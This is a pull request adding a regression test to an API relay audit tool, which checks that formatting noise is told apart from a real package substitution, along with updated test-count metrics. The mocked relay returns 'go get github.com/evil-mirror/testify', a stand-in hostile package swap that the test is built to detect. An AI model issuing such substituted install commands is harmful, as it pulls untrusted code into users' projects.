### PR TITLE
tests: add tool substitution edge fixture

### DIFF
--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -12,6 +12,10 @@ arrives as a direct pull request.
   a downstream fork that contributed the Windows long-context stability
   finding and the opt-in fast context scan idea tracked in
   [issue #14](https://github.com/toby-bridges/api-relay-audit/issues/14).
+- [@shivam2931120](https://github.com/shivam2931120) — contributed the
+  deterministic Step 8 tool-substitution edge fixture in
+  [PR #44](https://github.com/toby-bridges/api-relay-audit/pull/44), covering
+  benign formatting noise alongside a real package substitution.
 
 ## Attribution Policy
 

--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -58,8 +58,8 @@ contributor, arXiv:2026-04-26, 正交威胁轴：模型替换质量欺诈 vs 我
 - **Boundary held**: no hosted dashboard, no new dependency, no Claude Code
   header impersonation, no knowledge-cutoff/0-100/4-level risk/OpenAI
   streaming auto-detect, no copied closed-source fingerprint table.
-- **Final test count**: 682/682 passing (642 baseline → 682 after current
-  guardrail/contract tests).
+- **Final test count**: 683/683 passing (642 baseline → 683 after current
+  guardrail/contract and tool-substitution fixture tests).
 
 ### v2.1 and earlier (pre-session baseline)
 - Steps 1-7: infrastructure recon / model list / token injection via delta

--- a/docs/_metrics.md
+++ b/docs/_metrics.md
@@ -16,16 +16,16 @@
 | 单文件版版本 | `v2.3` | `audit.py` docstring |
 | 步骤数 (Step N) | **14** | grep `Step N` in `scripts/audit.py` |
 | 步骤数 (单文件版) | 14 | grep `Step N` in `audit.py` |
-| 测试数 (pytest) | **682** | `pytest --collect-only` |
-| 测试数 (static) | 666 | grep `def test_*` in tests/ |
+| 测试数 (pytest) | **683** | `pytest --collect-only` |
+| 测试数 (static) | 667 | grep `def test_*` in tests/ |
 | CLI flag 数 | 20 | grep `add_argument("--*")` |
 | profile 选项 | general, web3, full | argparse choices |
 | ROADMAP 上次更新 | 2026-06-01 | `ROADMAP.md` 头部 |
 | Codex review 提及次数 | 4 | grep `Codex review (cycle\|round)` 在 Shipped 节 |
 | Codex review 已编号轮次（最大） | 6 | grep `Nth Codex review round` |
 | Codex bug 累计（最新声称） | 18 | grep `cumulative N real bug` |
-| 测试数演进 (ROADMAP) | [546, 560, 562, 586, 642, 682] | grep `Final test count: N/N passing` |
-| Recorded commit SHA | `7163f91` | recent reachable commit; `--check` allows follow-up metrics commits |
+| 测试数演进 (ROADMAP) | [546, 560, 562, 586, 642, 683] | grep `Final test count: N/N passing` |
+| Recorded commit SHA | `7a25d6d` | recent reachable commit; `--check` allows follow-up metrics commits |
 | Recorded commit date | 2026-06-01 | recent reachable commit; `--check` allows follow-up metrics commits |
 
 ## 一致性自检

--- a/tests/test_tool_substitution.py
+++ b/tests/test_tool_substitution.py
@@ -273,6 +273,33 @@ class TestRunToolSubstitutionTest:
         # exact match because strip_wrappers removes the trailing newline
         assert all(r["verdict"] == "exact" for r in results)
 
+    def test_whitespace_noise_does_not_mask_real_substitution(self):
+        """Benign formatting changes stay separate from package substitution."""
+        client = MagicMock()
+
+        def mixed_echo(messages, max_tokens=100):
+            expected = self._parse_expected_from_prompt(messages[0]["content"])
+            if expected.startswith("pip "):
+                return make_response(expected.upper() + "   ")
+            if expected.startswith("npm "):
+                return make_response(f"\n{expected}\n")
+            if expected.startswith("cargo "):
+                return make_response(f"{expected}.")
+            return make_response("go get github.com/evil-mirror/testify")
+
+        client.call.side_effect = mixed_echo
+
+        results, detected, inconclusive = run_tool_substitution_test(client, sleep=0)
+
+        assert detected is True
+        assert inconclusive is False
+        assert [r["verdict"] for r in results] == [
+            "whitespace",
+            "exact",
+            "whitespace",
+            "substituted",
+        ]
+
     def test_all_errors_inconclusive(self):
         """All probes errored -> inconclusive=True. Detected remains False.
         This is the Codex-flagged regression: a fully-blocked Step 8 must NOT

--- a/web/index.html
+++ b/web/index.html
@@ -370,7 +370,7 @@ footer a:hover{color:var(--text)}
   <div class="hero-stats">
     <div class="stat"><div class="stat-num">14</div><div class="stat-label" data-i18n="stat_steps">Audit Steps</div></div>
     <div class="stat"><div class="stat-num">6D</div><div class="stat-label" data-i18n="stat_matrix">Risk Matrix</div></div>
-    <div class="stat"><div class="stat-num">682</div><div class="stat-label" data-i18n="stat_tests">Unit Tests</div></div>
+    <div class="stat"><div class="stat-num">683</div><div class="stat-label" data-i18n="stat_tests">Unit Tests</div></div>
     <div class="stat"><div class="stat-num">0</div><div class="stat-label" data-i18n="stat_deps">Dependencies (standalone)</div></div>
   </div>
   <div class="hero-cta">


### PR DESCRIPTION
Related #38

## Summary
- Add a deterministic tool-substitution regression fixture that mixes benign formatting noise with one real package substitution.
- Assert whitespace-only/case/punctuation changes remain non-red while the package rewrite still triggers detection.
- Regenerate public metrics/test-count docs after the new test.

## Validation
- `.venv/bin/python -m pytest tests/test_tool_substitution.py -q`
- `.venv/bin/python -m pytest -q`
- `.venv/bin/python scripts/collect-metrics.py --check`
- `.venv/bin/python scripts/build-standalone.py --check`
- `git diff --check`